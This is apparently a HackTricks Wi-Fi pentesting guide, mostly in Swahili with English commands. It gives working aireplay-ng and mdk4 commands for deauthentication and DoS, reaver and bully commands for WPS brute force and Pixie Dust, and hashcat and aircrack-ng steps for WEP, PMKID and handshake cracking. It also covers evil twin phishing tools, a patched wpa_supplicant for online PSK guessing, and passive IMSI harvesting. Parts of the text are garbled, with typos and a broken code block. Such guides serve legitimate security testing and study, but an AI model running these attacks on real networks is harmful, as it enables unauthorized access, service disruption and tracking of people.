Pentesting Wifi

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Wifi amri za msingi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Zana

Hijacker & NexMon (Wi‑Fi ya ndani ya Android)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Endesha airgeddon kwa docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Inaweza kufanya mashambulizi ya Evil Twin, KARMA, na Known Beacons kisha kutumia template ya phishing ili kupata password halisi ya network au kunasa social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Zana hii inautomatisha mashambulizi ya WPS/WEP/WPA-PSK. Kwa otomatiki itafanya:

  • Weka interface katika monitor mode
  • Scan kwa mitandao inayowezekana - na ikuruhusu kuchagua waathiriwa
  • Ikiwa WEP - Anza mashambulizi ya WEP
  • Ikiwa WPA-PSK
  • Ikiwa WPS: Pixie dust attack na the bruteforce attack (kuwa mwangalifu; the brute-force attack inaweza kuchukua muda mrefu). Kumbuka haijaribu null PIN au database/generated PINs.
  • Jaribu kunasa PMKID kutoka AP ili ku-crack
  • Jaribu ku-deauthenticate wateja wa AP ili kunasa handshake
  • Ikiwa PMKID au Handshake, jaribu bruteforce ukitumia top5000 passwords.

Muhtasari wa Mashambulizi

  • DoS
  • Deauthentication/disassociation – Kuwakatisha wote (au ESSID/Client maalum)
  • Random fake APs – Kuficha nets, inaweza ku-crash scanners
  • Overload AP – Jaribu ku-kill AP (kawaida si ya manufaa sana)
  • WIDS – Cheza na IDS
  • TKIP, EAPOL – Baadhi ya mashambulizi maalum ya DoS kwa baadhi ya APs
  • Cracking
  • Crack WEP (several tools and methods)
  • WPA-PSK
  • WPS pin “Brute-Force”
  • WPA PMKID bruteforce
  • [DoS +] WPA handshake capture + Cracking
  • WPA-MGT
  • Username capture
  • Bruteforce Credentials
  • Evil Twin (with or without DoS)
  • Open Evil Twin [+ DoS] – Inafaa kwa kunasa captive portal creds na/au kufanya LAN attacks
  • WPA-PSK Evil Twin – Inafaa kwa network attacks ikiwa unajua password
  • WPA-MGT – Inafaa kunasa company credentials
  • KARMA, MANA, Loud MANA, Known beacon
  • + Open – Inafaa kwa kunasa captive portal creds na/au kufanya LAN attacks
  • + WPA – Inafaa kunasa WPA handshakes

Open / OWE networks - Vidokezo vya haraka

  • Passive capture kwenye open SSIDs bado inafanya kazi kwa monitor mode na tcpdump:
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
  • OWE (Opportunistic Wireless Encryption) hufanya per-station key exchange (no PSK), hivyo air frames zimefichwa hata kwenye “open” SSIDs. Kwa kuwa inategemea WPA3, pia inatekeleza 802.11w PMF, ambayo inazuia spoofed deauth/disassoc frames.
  • OWE does not authenticate joiners: yeyote anaweza associate, hivyo verify client isolation badala ya kuamini mada za uuzaji. Bila isolation, ARP spoofing au responder-style poisoning kwenye L2 ya ndani bado inaendelea kufanya kazi.
  • Evil Twin bado inawezekana kwenye open/OWE SSIDs kwa kuonyesha ishara yenye nguvu zaidi; PMF inabana tu njia ya deauth shortcut. Ikiwa waathiriwa watakubali forged TLS cert, full HTTP(S) MitM inarudishwa.
  • Broadcast poisoning kwenye open guest Wi-Fi huzalisha kwa urahisi creds/hashes (LLMNR/NBT-NS/mDNS). Angalia:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Paketi

Description from here:.

Deauthentication attacks, mbinu inayotumika sana katika Wi-Fi hacking, zinahusisha kutengeneza “management” frames ili kuwatoa kwa nguvu vifaa kutoka kwenye mtandao. Paketi hizi zisizofichwa zinaudanganya wateja kuwaza zinatoka kwenye mtandao halali, zikimruhusu mshambuliaji kukusanya WPA handshakes kwa ajili ya cracking au kuendelea kuingilia muunganisho wa mtandao. Mbinu hii, ya kutisha kwa urahisi wake, inatumiwa sana na ina athari kubwa kwa usalama wa mtandao.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 ina maana deauthentication
  • 1 ni idadi ya deauths za kutuma (unaweza kutuma nyingi kama unataka); 0 ina maana zitumiwe kwa mfululizo
  • -a 00:14:6C:7E:40:80 ni anwani ya MAC ya access point
  • -c 00:0F:B5:34:30:30 ni anwani ya MAC ya client kwa ajili ya ku-deauthenticate; ikiwa hii itaachwa basi broadcast deauthentication itatumwa (si kila mara hufanya kazi)
  • ath0 ni jina la kiolesura

Disassociation Packets

Disassociation packets, sawa na deauthentication packets, ni aina ya management frame inayotumika katika mitandao ya Wi-Fi. Paketi hizi hutumika kukata muunganisho kati ya kifaa (kama laptop au smartphone) na access point (AP). Tofauti kuu kati ya disassociation na deauthentication iko katika mazingira yao ya matumizi. Wakati AP inapotuma deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, kuanzishwa upya, au kuhama, hivyo kusababisha kuachishwa uunganisho kwa nodes zote zilizounganishwa.

Shambulio hili linaweza kufanywa na mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Mashambulio zaidi ya DOS na mdk4

Katika here.

ATTACK MODE b: Beacon Flooding

Inatuma beacon frames ili kuonyesha fake APs kwa clients. Hii wakati mwingine inaweza ku-crash network scanners na hata drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Kutuma authentication frames kwa Access Points (APs) zote zinazopatikana ndani ya umbali kunaweza kuzipa mzigo kupita kiasi, hasa wakati clients wengi wanahusika. Trafiki hii yenye msongamano mkubwa inaweza kusababisha ukosefu wa utulivu wa mfumo, na kusababisha baadhi ya APs kuganda au hata kuanzishwa upya.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) inakagua kama SSID imefunuliwa ipasavyo na kuthibitisha upeo wa AP. Mbinu hii, ikichanganywa na bruteforcing hidden SSIDs kwa kutumia au bila wordlist, husaidia kutambua na kuingia kwenye mitandao yaliyofichwa.

ATTACK MODE m: Michael Countermeasures Exploitation

Kutuma packets za nasibu au za nakala kwa QoS queues tofauti kunaweza kusababisha Michael Countermeasures kwenye TKIP APs, na kusababisha AP kuzimwa kwa dakika moja. Njia hii ni mbinu yenye ufanisi ya kushambulia kwa DoS (Denial of Service).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Kumwaga trafiki kwa AP kwa kutumia EAPOL Start frames kunaunda fake sessions, kuzidi uwezo wa AP na kuzuia wateja halali. Vinginevyo, kuingiza fake EAPOL Logoff messages kunawalazimisha wateja kutengwa; mbinu zote mbili huvuruga huduma ya mtandao kwa ufanisi.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Mashambulizi kwa mitandao ya mesh ya IEEE 802.11s

Mashambulizi mbalimbali dhidi ya usimamizi wa viungo na routing katika mitandao ya mesh.

ATTACK MODE w: WIDS Changanyiko

Kuunganisha wateja kwa msalaba kwa node nyingi za WDS au fake rogue APs kunaweza kudanganya Intrusion Detection and Prevention Systems, kuzalisha changanyiko na uwezekano wa matumizi mabaya ya mfumo.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer inayoonyesha vyanzo mbalimbali vya packet na seti kamili ya modifiers kwa ajili ya packet manipulation.

Airggedon

Airgeddon inatoa sehemu nyingi za mashambulizi yaliyopendekezwa katika maoni yaliyotangulia:

WPS

WPS (Wi-Fi Protected Setup) inarahisisha mchakato wa kuunganisha vifaa na router, na kuongeza kasi na urahisi wa setup kwa mitandao iliyosimbwa kwa WPA au WPA2 Personal. Haifai kwa usalama wa WEP ambao unavunjika kwa urahisi. WPS inatumia PIN ya tarakimu 8, iliyothibitishwa kwa nusu mbili, jambo linaloiweka katika hatari ya brute-force attacks kutokana na idadi ndogo ya mseto (uwezekano 11,000).

WPS Bruteforce

Kuna zana kuu 2 za kutekeleza tendo hili: Reaver na Bully.

  • Reaver imetengenezwa kama shambulio thabiti na la vitendo dhidi ya WPS, na imekaguliwa dhidi ya aina mbalimbali za access points na implementations za WPS.
  • Bully ni new implementation ya WPS brute force attack, imeandikwa kwa C. Ina faida kadhaa juu ya msimbo wa reaver wa awali: fewer dependencies, utendaji ulioimarishwa wa memory na cpu, utunzaji sahihi wa endianness, na seti ya chaguzi iliyo thabiti zaidi.

Shambulio linatumia udhaifu wa WPS PIN, hasa kuonyesha tarakimu nne za kwanza na jukumu la tarakimu ya mwisho kama checksum, jambo linalorahisisha brute-force attack. Hata hivyo, mbinu za kujilinda dhidi ya brute-force attacks, kama vile blocking MAC addresses za washambulizi wenye hamu, zinahitaji MAC address rotation ili kuendelea na shambulio.

Baada ya kupata WPS PIN kwa kutumia zana kama Bully au Reaver, mshambulizi anaweza kutabiri WPA/WPA2 PSK, na hivyo kuhakikisha persistent network access.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Mbinu hii iliyoboreshwa inalenga WPS PINs kwa kutumia udhaifu uliotambuliwa:

  1. PINs Zilizogunduliwa Awali: Tumia database ya PINs zilizotambulishwa iliyounganishwa na watengenezaji maalum ambao wanajulikana kutumia WPS PINs sawa. Database hii inaoanisha octeti tatu za kwanza za MAC-addresses na PINs zinazowezekana kwa watengenezaji hao.
  2. Algoritimu za Uundaji wa PIN: Tumia algorithms kama ComputePIN na EasyBox, ambazo hufanya hesabu za WPS PINs kwa msingi wa MAC-address ya AP. Algorithm ya Arcadyan pia inahitaji device ID, ikiongeza tabaka kwenye mchakato wa uzalishaji wa PIN.

WPS Pixie Dust attack

Dominique Bongard aligundua kasoro katika baadhi ya Access Points (APs) inayohusiana na uundaji wa nambari za siri, zinazoitwa nonces (E-S1 na E-S2). Ikiwa nonces hizi zinaweza kubuniwa, kuvunja WPS PIN ya AP kunakuwa rahisi. AP inafichua PIN ndani ya msimbo maalum (hash) kuonyesha kuwa ni halali na siyo AP bandia (rogue). Nonces hizi kwa msingi ni “vifunguo” vya kufungua “salama” inayoshikilia WPS PIN. More on this can be found here.

Kwa maneno rahisi, tatizo ni kwamba baadhi ya APs hazikutumia funguo za kutosha za nasibu za kusimbwa kwa PIN wakati wa mchakato wa kuunganisha. Hii inafanya PIN kuwa nyeti kwa kukisia kutoka nje ya mtandao (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ikiwa hautaki kuweka kifaa kwenye monitor mode, au reaver na bully zina tatizo fulani, unaweza kujaribu OneShot-C. Zana hii inaweza kutekeleza Pixie Dust attack bila kuhitaji kuweka kifaa kwenye monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Baadhi ya mifumo iliyo mbovu hata huruhusu Null PIN (PIN tupu au isiyopo) kutoa ufikiaji, jambo lisilo la kawaida. Zana Reaver inaweza kujaribu udhaifu huu, tofauti na Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All the proposed WPS attacks can be easily performed using airgeddon.

  • 5 na 6 hukuruhusu kujaribu PIN yako maalum (ikiwa una yoyote)
  • 7 na 8 zinafanya Pixie Dust attack
  • 13 inakuwezesha kujaribu NULL PIN
  • 11 na 12 zitakusanya tena PINs zinazohusiana na AP iliyochaguliwa kutoka kwa available databases na generate possible PINs using: ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
  • 9 na 10 zitajaribu every possible PIN

WEP

Kwa nini inavunjika

  • RC4 seed ni tu IV (24 bits) + shared key. IV iko kwenye cleartext, ndogo (2^24), na inarudia haraka, hivyo ciphertexts zenye IV sawa zinatumia tena keystream.
  • Kufanya XOR kwa ciphertexts mbili zenye keystream sawa leaks PlaintextA ⊕ PlaintextB; vichwa vinavyotabirika + RC4 KSA biases (FMS) vinakuwezesha “kupiga kura” key bytes. PTW inaboresha hili kwa kutumia trafiki ya ARP ili kupunguza mahitaji hadi maelfu kadhaa ya packets badala ya mamilioni.
  • Uadilifu ni tu CRC32 (linear/unkeyed), hivyo mshambuliaji anaweza kubadili bits na kuhesabu CRC32 tena bila key → packet forgery/replay/ARP injection wakati akisubiri IVs.

Uvunjaji wa vitendo ni wa kithabiti:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon bado inakuja na “All-in-One” WEP workflow ikiwa unapendelea UI iliyoongozwa.

WPA/WPA2 PSK

PMKID

Mwaka 2018, hashcat revealed mbinu mpya ya shambulio, ya kipekee kwa sababu inahitaji tu paketi moja tu na haihitaji kliente wowote kuunganishwa na AP lengwa—ni mwingiliano tu kati ya mshambuliaji na AP.

Routers za kisasa nyingi zinaongeza uwanja la hiari kwenye first EAPOL frame wakati wa kuunganishwa, linalojulikana kama Robust Security Network. Hii inajumuisha PMKID.

Kama chapisho la asili linavyoeleza, PMKID huundwa kwa kutumia data inayojulikana:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Kwa kuwa “PMK Name” ni thabiti, tunajua BSSID ya AP na station, na PMK ni sawa kabisa na ile kutoka kwa full 4-way handshake, hashcat inaweza kutumia taarifa hii kuvunja PSK na kurejesha passphrase!

Ili kukusanya taarifa hizi na kufanya bruteforce ya password kwa mashine yako unaweza kufanya:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured zitaonyeshwa kwenye console na pia zitahifadhiwa ndani ya _ /tmp/attack.pcap_
Sasa, convert the capture to hashcat/john format and crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Tafadhali kumbuka muundo wa hash sahihi una sehemu 4, kama: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838. Ikiwa yako tu ina sehemu 3, basi ni batili (PMKID capture haikuwa halali).

Kumbuka kwamba hcxdumptool pia capture handshakes (kitu kama hiki kitatokea: MP:M1M2 RC:63258 EAPOLTIME:17091). Unaweza transform handshakes kuwa format ya hashcat/john kwa kutumia cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Nimegundua kuwa baadhi ya handshakes zilizorekodiwa kwa kutumia zana hii hazikuweza ku-crack hata tukijua password sahihi. Ninapendekeza kunasa handshakes pia kwa njia ya jadi inapowezekana, au kunasa kadhaa kwa kutumia zana hii.

Handshake capture

Shambulio kwenye WPA/WPA2 networks linaweza kufanywa kwa kunasa handshake na kujaribu crack password offline. Mchakato huu unahusisha kufuatilia mawasiliano ya mtandao maalum na BSSID kwenye channel fulani. Hapa kuna mwongozo uliorahisishwa:

  1. Tambua BSSID, channel, na connected client wa mtandao lengwa.
  2. Tumia airodump-ng kufuatilia trafiki ya mtandao kwenye channel na BSSID zilizotajwa, ukitarajia kunasa handshake. Amri itaonekana kama hii:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. Ili kuongeza nafasi ya kukamata handshake, kata muunganisho wa client kutoka kwenye network kwa muda mfupi ili kulazimisha re-authentication. Hii inaweza kufanywa kwa kutumia amri ya aireplay-ng, ambayo inatuma deauthentication packets kwa client:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Kumbuka kwamba kwa kuwa client alideauthenticated, inaweza kujaribu kuungana na AP tofauti au, katika kesi nyingine, na network tofauti.

Mara tu taarifa za handshake zinapoonekana katika airodump-ng, hii ina maana handshake ilikamatwa na unaweza kuacha kusikiliza:

Mara handshake itakapokamatwa unaweza crack kwa kutumia aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Angalia ikiwa handshake iko katika faili

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ikiwa zana hii itapata handshake isiyokamilika ya ESSID kabla ya ile iliyokamilika, haitagundua ile halali.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Utabiri wa PSK wa mtandaoni kwa kasi zaidi kupitia ctrl socket ya wpa_supplicant (hakuna clients/PMKID)

Wakati hakuna clients karibu na AP inakataa PMKID, unaweza kujaribu PSKs mtandaoni bila kuanzisha tena supplicants:

  • Patch wpa_supplicant.c ili kulazimisha dur = 0; katika mantiki ya backoff ya auth failure (kando ya ssid->auth_failures), hivyo kuzima timer ya temporary-disable.
  • Endesha daemon moja kwa control socket:
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
  • Dhibiti kupitia kiolesura cha udhibiti, ukitumia tena scan na network ile ile:
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Loop ndogo ya Python inayosoma socket events (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) inaweza kujaribu takriban makisio 100 ndani ya takriban dakika 5 bila scan overhead. Bado ni noisy na inagundulika, lakini inazuia process restarts kwa kila jaribio na backoff delays.

WPA Enterprise (MGT)

Katika mipangilio ya WiFi ya shirika, utakutana na mbinu mbalimbali za uthibitishaji, kila moja ikitoa viwango tofauti vya usalama na vipengele vya usimamizi. Unapotumia zana kama airodump-ng kuchunguza trafiki ya mtandao, unaweza kugundua vitambulisho vya aina hizo za uthibitishaji. Baadhi ya mbinu za kawaida ni:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • Njia hii inasaidia hardware tokens na one-time passwords ndani ya EAP-PEAP. Tofauti na MSCHAPv2, haitumii peer challenge na inatuma passwords kwa maandishi wazi kwa access point, ikisababisha hatari ya downgrade attacks.
  1. EAP-MD5 (Message Digest 5):
  • Inahusisha kutuma hash ya MD5 ya nenosiri kutoka kwa client. Haipendekezwi kwa sababu ya udhaifu dhidi ya dictionary attacks, ukosefu wa server authentication, na uwezo mdogo wa kuzalisha WEP keys maalum kwa session.
  1. EAP-TLS (Transport Layer Security):
  • Inatumia vyeti vya upande wa client na upande wa server kwa authentication na inaweza kuzalisha vifunguo vya WEP vya mtumiaji na vya kikao kwa ajili ya kuimarisha mawasiliano.
  1. EAP-TTLS (Tunneled Transport Layer Security):
  • Inatoa mutual authentication kupitia tuneli iliyo encrypted, pamoja na mbinu ya kupata vifunguo vya WEP vinavyotokana na mtumiaji na kikao. Inahitaji vyeti vya upande wa server pekee, na clients hutumia credentials.
  1. PEAP (Protected Extensible Authentication Protocol):
  • Inafanya kazi kwa namna inayofanana na EAP kwa kuunda tuneli ya TLS kwa mawasiliano yaliyolindwa. Inaruhusu matumizi ya itifaki dhaifu za authentication juu ya EAP kutokana na ulinzi unaotolewa na tuneli.
  • PEAP-MSCHAPv2: Mara nyingi huitwa PEAP, inaunganisha kifaa dhaifu cha MSCHAPv2 challenge/response ndani ya tuneli ya ulinzi ya TLS.
  • PEAP-EAP-TLS (or PEAP-TLS): Inafanana na EAP-TLS lakini inaanzisha tuneli ya TLS kabla ya kubadilishana vyeti, ikitoa tabaka ziada ya usalama.

You can find more information about these authentication methods here and here.

Username Capture

Kusoma https://tools.ietf.org/html/rfc3748#page-27 kunaonekana kwamba ikiwa unatumia EAP ujumbe za “Identity” zinapaswa kuungwa mkono, na username itatumwa kwa wazi katika ujumbe za “Response Identity”.

Hata ukitumia moja ya njia salama zaidi za authentication: PEAP-EAP-TLS, inawezekana kunasa username inayotumwa katika EAP protocol. Kufanya hivyo, chukua mawasiliano ya authentication (anzisha airodump-ng ndani ya channel na wireshark kwenye interface hiyo hiyo) na filter paketi kwa eapol.
Ndani ya paketi ya “Response, Identity”, jina la mtumiaji wa client litaonekana.

Anonymous Identities

Utambulisho wa siri unasaidiwa na EAP-PEAP na EAP-TTLS. Katika muktadha wa mtandao wa WiFi, ombi la EAP-Identity kwa kawaida linaanzishwa na access point (AP) wakati wa mchakato wa association. Ili kuhakikisha ulinzi wa utambulisho wa mtumiaji, mwitikio kutoka kwa EAP client kwenye kifaa cha mtumiaji kinajumuisha tu taarifa muhimu zinazohitajika kwa server ya awali ya RADIUS kuchakata ombi. Dhana hii inaelezewa kupitia matukio yafuatayo:

  • EAP-Identity = anonymous
  • Katika senario hii, watumiaji wote wanatumia majina bandia “anonymous” kama kitambulisho chao. Server ya awali ya RADIUS inafanya kazi kama EAP-PEAP au EAP-TTLS server, ikisimamia upande wa server wa itifaki ya PEAP au TTLS. Mbinu ya ndani (iliyolindwa) ya authentication kisha inashughulikiwa ndani au kupelekwa kwa RADIUS server ya mbali (home).
  • EAP-Identity = anonymous@realm_x
  • Katika hali hii, watumiaji kutoka realms tofauti wanaficha utambulisho wao huku wakionyesha realm zao. Hii inaruhusu server ya awali ya RADIUS kuwa proxy kwa maombi ya EAP-PEAP au EAP-TTLS kwa RADIUS servers katika realms zao za home, ambazo zinafanya kazi kama server za PEAP au TTLS. Server ya awali ya RADIUS inafanya kazi tu kama nodi ya relay ya RADIUS.
  • Mbali na hayo, server ya awali ya RADIUS inaweza kufanya kazi kama server ya EAP-PEAP au EAP-TTLS na kushughulikia mbinu ya authentication iliyolindwa au kuipeleka kwa server nyingine. Chaguo hili linawezesha kusanidi sera tofauti kwa realms mbalimbali.

Katika EAP-PEAP, mara tu tuneli ya TLS itakapowekwa kati ya PEAP server na PEAP client, PEAP server huanzisha ombi la EAP-Identity na kulituma kupitia tuneli ya TLS. Client hutangaza ombi hili la pili la EAP-Identity kwa kutuma response ya EAP-Identity ambayo ina utambulisho halisi wa mtumiaji kupitia tuneli iliyofichwa. Njia hii inazuia kwa ufanisi ufichaji wa utambulisho wa mtumiaji kwa mtu yeyote anayesikiliza trafiki ya 802.11.

EAP-TTLS inafuata hatua tofauti kidogo. Kwa EAP-TTLS, client kwa kawaida inathibitisha kwa kutumia PAP au CHAP, kulindwa na tuneli ya TLS. Katika kesi hii, client hujumuisha attribute ya User-Name na Password au CHAP-Password katika ujumbe wa awali wa TLS uliopelekwa baada ya kuanzishwa kwa tuneli.

Bila kujali protocol iliyochaguliwa, server ya PEAP/TTLS inapata maarifa ya utambulisho halisi wa mtumiaji baada ya tuneli ya TLS kuanzishwa. Utambulisho halisi unaweza kuwakilishwa kama user@realm au kwa urahisi user. Ikiwa PEAP/TTLS server pia ndiye anayehusika na ku-authenticate mtumiaji, sasa anamiliki utambulisho wa mtumiaji na anaendelea na mbinu ya authentication iliyolindwa na tuneli ya TLS. Vinginevyo, PEAP/TTLS server inaweza kutuma ombi jipya la RADIUS kwa RADIUS server ya home ya mtumiaji. Ombi jipya la RADIUS haliwezi kuwa na safu ya PEAP au TTLS. Katika kesi ambapo mbinu iliyolindwa ya authentication ni EAP, ujumbe za ndani za EAP zitatumwa kwa RADIUS server ya home bila kiufunguo cha EAP-PEAP au EAP-TTLS. Attribute ya User-Name ya ujumbe wa RADIUS unaotumwa itaonyesha utambulisho halisi wa mtumiaji, ikibadilisha User-Name ya anonymous kutoka kwa ombi la RADIUS linalokuja. Wakati mbinu iliyolindwa ya authentication ni PAP au CHAP (inayot supported tu na TTLS), User-Name na attribute nyingine za authentication zilizotolewa kutoka kwa TLS payload zitachukuliwa kwenye ujumbe wa RADIUS unaotoka, zikibadilisha User-Name ya anonymous na attribute za TTLS EAP-Message zilizopo kwenye ombi la RADIUS linalokuja.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

  • 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
  • Authenticator sends EAP-Request/Identity.
  • Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
  • Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
  • Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

Bonyeza ili kupanua ```bash # 1) Enable monitor mode airmon-ng start wlan0

2) Optional: lock channel to the target BSS

airodump-ng wlan0mon –essid

3) Capture 802.1X/EAP frames

Wireshark display filters:

eap || eapol

(identity specifically): eap.code == 2 && eap.type == 1

Kismet: add source wlan0mon; enable 802.1X/EAP views

tcpdump (pcap capture):

tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

4) Wait for a device to auto-connect to the SSID

5) Inspect the first EAP-Response/Identity frame

Expected: ASCII NAI containing IMSI, e.g.

20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

</details>

Maelezo:
- Inafanya kazi kabla ya tuneli yoyote ya TLS ikiwa mpangilio unatumia bare EAP‑SIM/AKA bila protected identity/pseudonyms.
- Thamani iliyofichuliwa ni kitambulisho cha kudumu kilichounganishwa na SIM ya mteja; kukusanya kunawawezesha ufuatiliaji wa muda mrefu na matumizi mabaya ya telecom yanayofuata.

Athari
- Faragha: ufuatiliaji wa kudumu wa mtumiaji/kifaa kutokana na kunasa pasivu kwa Wi‑Fi katika maeneo ya umma.
- Kuanzishwa kwa matumizi mabaya ya telecom: kwa IMSI, mshambuliaji mwenye ufikiaji wa SS7/Diameter anaweza kuulizia eneo au kujaribu kuingilia kati call/SMS na kuiba MFA.

Kupunguza hatari / Vitu vya kuangalia
- Thibitisha kwamba wateja wanatumia vitambulisho vya nje visivyojulikana (pseudonyms) kwa EAP‑SIM/AKA kama inavyoelekezwa na 3GPP (mf., 3GPP TS 33.402).
- Pendelea kutumia tunneling kwa hatua ya utambulisho (mf., EAP‑TTLS/PEAP ikibeba inner EAP‑SIM/AKA) ili IMSI isitumwe wazi.
